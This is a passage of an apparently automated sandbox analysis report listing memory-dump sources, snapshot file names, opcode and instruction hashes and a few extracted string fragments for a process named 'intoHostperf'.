                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89fa3a545468ad1720fb68dbde11ae3e83281b15f395f8e1f6e178a5e868d7d5
                                                              • Instruction ID: e64814542576e50e3a84d0f7deeb328b1370852444368d3482a7fe53df80a29d
                                                              • Opcode Fuzzy Hash: 89fa3a545468ad1720fb68dbde11ae3e83281b15f395f8e1f6e178a5e868d7d5
                                                              • Instruction Fuzzy Hash: 1031F83591C9CA8FEBA8EF5884959BEB7B1FF54390F52017AD00ED6581DA3CA8408F81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d7d6bd2dc1d6147003d1b982052d0a3247165be701fe984423a0cf877b1597f
                                                              • Instruction ID: baf52f2d83624ba71e6566afba61b83df9399f3fccf298d4a7ca55cc9e01a4ab
                                                              • Opcode Fuzzy Hash: 9d7d6bd2dc1d6147003d1b982052d0a3247165be701fe984423a0cf877b1597f
                                                              • Instruction Fuzzy Hash: 3431A431F0D99A9FDB98EB6CC4514A8F7A1FF443A0B854179D00997282CB28BC128B82
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe9e609548b13694c99f9fd855ff33bb605f7c0ad3c7d570d7db961f5e67c6
                                                              • Instruction ID: 6254368091b20f6eba91e5335314ba3c42bc2b1ca033784907cd1acf2374eadd
                                                              • Opcode Fuzzy Hash: cbfe9e609548b13694c99f9fd855ff33bb605f7c0ad3c7d570d7db961f5e67c6
                                                              • Instruction Fuzzy Hash: 4C312570D0CA8ACFEFAAEF68C4451BD77A1FF54390F5000BAD40AC6981DA2CA980DB41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15591ac07f2b8aa05a4fff8d36dea0b08c3d0dbd9aa77464e59f4f2adf3743b2
                                                              • Instruction ID: c9b166fe7653fa23c4a965127a730064dfcf140a612edd15c8a6467c90ce4c29
                                                              • Opcode Fuzzy Hash: 15591ac07f2b8aa05a4fff8d36dea0b08c3d0dbd9aa77464e59f4f2adf3743b2
                                                              • Instruction Fuzzy Hash: 8BF0623184E2C69FD317DF7088554E9BFB4EF43264F1A04FAE05ACB0A2D66D5606CB62
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23bff3b5278a79fc7291a079496af7c1a00b8357622fdaa8020450df6609f1ba
                                                              • Instruction ID: 7e3802aa863b2714f5254178a9e367bfe3f390e3e64c5024a6e707b8732cb838
                                                              • Opcode Fuzzy Hash: 23bff3b5278a79fc7291a079496af7c1a00b8357622fdaa8020450df6609f1ba
                                                              • Instruction Fuzzy Hash: 48F0313294D81A4EEB94FA54D848BF833A1EF84355F1101B9C01DD3195DF286D858B04
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31f8db0d33493ae1ce03dd50a758effbbc5e71a8a53c698d5c19e58c6ab9c27
                                                              • Instruction ID: ce62653c5641b340a8461e85b8e18cc75b43432426f39290b2e68cf25d99611d
                                                              • Opcode Fuzzy Hash: c31f8db0d33493ae1ce03dd50a758effbbc5e71a8a53c698d5c19e58c6ab9c27
                                                              • Instruction Fuzzy Hash: 7BF05E2190EA8B8EF7763D1094111F9BA55AF513F1FA2103BD50E865C2CD1D69015B93
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a090285b04ecf7d8278ae1340a3b4bae20ee22d42a27f059d8fc60ab5447434a
                                                              • Instruction ID: 8d89066429898371d070cef467626143232ea86355af343c5f79e4a136d99d5f
                                                              • Opcode Fuzzy Hash: a090285b04ecf7d8278ae1340a3b4bae20ee22d42a27f059d8fc60ab5447434a
                                                              • Instruction Fuzzy Hash: 1BE02BBA95EA45CFD780A638DCA06D5BBA0FF0134DF4602BEC089C3652E391585DC780
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b910003f4ba6bd5172649ea83043032cc488586edfaaaad4a7129be5c906f1b1
                                                              • Instruction ID: 08c39ee011c97e4a758ab1b39f92b497f9e7408e843299c5c94c6feb2ac7bf11
                                                              • Opcode Fuzzy Hash: b910003f4ba6bd5172649ea83043032cc488586edfaaaad4a7129be5c906f1b1
                                                              • Instruction Fuzzy Hash: 7EF0902190E7C64FEF32AF68CC914A83FE09F6736070906FAD0888B2D7D55C2446D711
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73315f076465e318b0f9a4094c1e21ea03a8bba1b2101b4396e9b90e5b510417
                                                              • Instruction ID: 80e1c17ead88d3626fbaac9d836ab1c23a1797dad72b5e2c2f51e3724dbd81a1
                                                              • Opcode Fuzzy Hash: 73315f076465e318b0f9a4094c1e21ea03a8bba1b2101b4396e9b90e5b510417
                                                              • Instruction Fuzzy Hash: F6F01232A4D4094FEBA4FA14D8887B923A2EF943A9F1501B5C45DD31E6DF286D498644
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a15e2e1d6c094b5f9c18b2a0b2de94ad40e03c77fd574d715a917f2e055e4afe
                                                              • Instruction ID: 300e23ac7695e2a1e5bb27e9ddbccf1e4b1abb5aec3d7e3e9ff76a8c86765e63
                                                              • Opcode Fuzzy Hash: a15e2e1d6c094b5f9c18b2a0b2de94ad40e03c77fd574d715a917f2e055e4afe
                                                              • Instruction Fuzzy Hash: 57E0C270D2C85E8EDF65EF88C4015FDB6B0FF48380F50007AC10EE2184DA282480C661
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45e2cf9707910c3fdd346bfba52b70efc523ed230843f40ce1b1c88199279e75
                                                              • Instruction ID: 658fd1017f4b75447b6d0adec61c6b49a63817441a2586e2302687ca817f20cd
                                                              • Opcode Fuzzy Hash: 45e2cf9707910c3fdd346bfba52b70efc523ed230843f40ce1b1c88199279e75
                                                              • Instruction Fuzzy Hash: 1DE01A31E0E4174FFB64F614D8407B96262AF98388F1400B4DA0ED32D2DF3CAD858A49
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f18269190a2ad39345e0525279b1430a882b1bb3a91307ababa9ae50c8ff01a
                                                              • Instruction ID: d132166a2312a25b9407788a0e41635f51b5bf24eba30af67c9633dfd82e0995
                                                              • Opcode Fuzzy Hash: 9f18269190a2ad39345e0525279b1430a882b1bb3a91307ababa9ae50c8ff01a
                                                              • Instruction Fuzzy Hash: BCC08C02D0F52B0AF400B16E34022ACA1005FC46D8FD50232C60C420C19F0D28DE014E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                              • Instruction ID: 95ce83a6834e6011011f0dd4d2b76eccbbd617e30b09e93c6a2b9198b6183dc6
                                                              • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                              • Instruction Fuzzy Hash: 24C04C34555C099FC948FB29C88591477A0FB19215FD60090E40DC7171D759DCD5C745
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction ID: cde3502d298ff1c877b03cb140258c31cb75861dcba92958e5ce760db7f2a621
                                                              • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction Fuzzy Hash: 78D09224E2C6C38DF9396F49C06063965914FA53A1E20417DD05F418C1CD1C7481E601
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 355f1cba0f93c65c19b9f9f008d132ec152b968214f9386fdb3060b430c07dc2
                                                              • Instruction ID: 3c148ffc7a25da8af7c3eb0c408eacf38072d7871fda31de204b12711b09e318
                                                              • Opcode Fuzzy Hash: 355f1cba0f93c65c19b9f9f008d132ec152b968214f9386fdb3060b430c07dc2
                                                              • Instruction Fuzzy Hash: ABD09210A0C6DB8EF979BE09C02123A96908F06780E60053AC0EF55CC2C92E7981AA12
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: addde97e8417e0b387dadf5c435b037b7cd000eba1eb4b698e29039176604eb9
                                                              • Instruction ID: 5399b2a1efb7fa753bcb84510a6acd4bceb1759ed3c4fef6f8252f3a1b233ffc
                                                              • Opcode Fuzzy Hash: addde97e8417e0b387dadf5c435b037b7cd000eba1eb4b698e29039176604eb9
                                                              • Instruction Fuzzy Hash: EED0C910E0F6878DF1787E91802073EA5905F903A1FA2003EC15F429C1CD1C7C417A02
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aefa209ad7119b382788077eb0473090eaba27def198a74fb9de87efbcbc04fa
                                                              • Instruction ID: 1890ae841b3d320c672b6f23af590b6480d0e278d8c8961d9205b2b180c605f0
                                                              • Opcode Fuzzy Hash: aefa209ad7119b382788077eb0473090eaba27def198a74fb9de87efbcbc04fa
                                                              • Instruction Fuzzy Hash: E4C04C51E5E85B56E5557215852127D0443EB94B84F944074E40E977CACE6C590612CB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c941de1e7d464f7059424c36c930c3fe85aa22a569e42444c0add91d8dbd449c
                                                              • Instruction ID: 39a9c099030cbe069fab21b4a51cc4acf32aa45fbec85a66c6c9c238c061865b
                                                              • Opcode Fuzzy Hash: c941de1e7d464f7059424c36c930c3fe85aa22a569e42444c0add91d8dbd449c
                                                              • Instruction Fuzzy Hash: 5BC012A0F0C2838FE7722D6008810BC92609B062A17C6053AC8068A1C3E91CA80A5B62
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd044758332ebbd5ef0a191d6c42c27f909fecff129b423ec5547d29263f8ae6
                                                              • Instruction ID: 4c0396d2771f7dbe7661ee5f90230b8198361c4991dacd91c1d4eb35e5ed9b34
                                                              • Opcode Fuzzy Hash: cd044758332ebbd5ef0a191d6c42c27f909fecff129b423ec5547d29263f8ae6
                                                              • Instruction Fuzzy Hash: E5B01200C5F40F04E40431BA184216970405F84188FC51270D80C410819B4D14DD024B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aWI$ bWI$0aWI$0bWI$@^WI$@bWI$HlWI$PbWI$`bWI$pbWI$`WI$bWI$dWI$eWI$nWI
                                                              • API String ID: 0-940567387
                                                              • Opcode ID: 47aad9a1a2f0c9c4e7ede2295163eef9941cd66f8fcc6dec36f524830f498178
                                                              • Instruction ID: 73ab9ae81fa25425aa915ae08d75122a77b95808cf647cf759a6ef5207c6ccd2
                                                              • Opcode Fuzzy Hash: 47aad9a1a2f0c9c4e7ede2295163eef9941cd66f8fcc6dec36f524830f498178
                                                              • Instruction Fuzzy Hash: 8BC1C062D0FBC28FE6662A78A8190757FB1FF12790B2901FBC184871DBD4689E45C3C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: da09f9a6bcee1a962996bcfbf05a354ed46fd846d00f896e1da8add6e8c22a7e
                                                              • Instruction ID: a83817ce90397f35e0a0d5a37d11d90214766cf6a80994f5948f94c7476466d0
                                                              • Opcode Fuzzy Hash: da09f9a6bcee1a962996bcfbf05a354ed46fd846d00f896e1da8add6e8c22a7e
                                                              • Instruction Fuzzy Hash: ED417F17A0F562A9E11133FE74293FD5B86EF812F9F084677E14C8A0874F08658692FD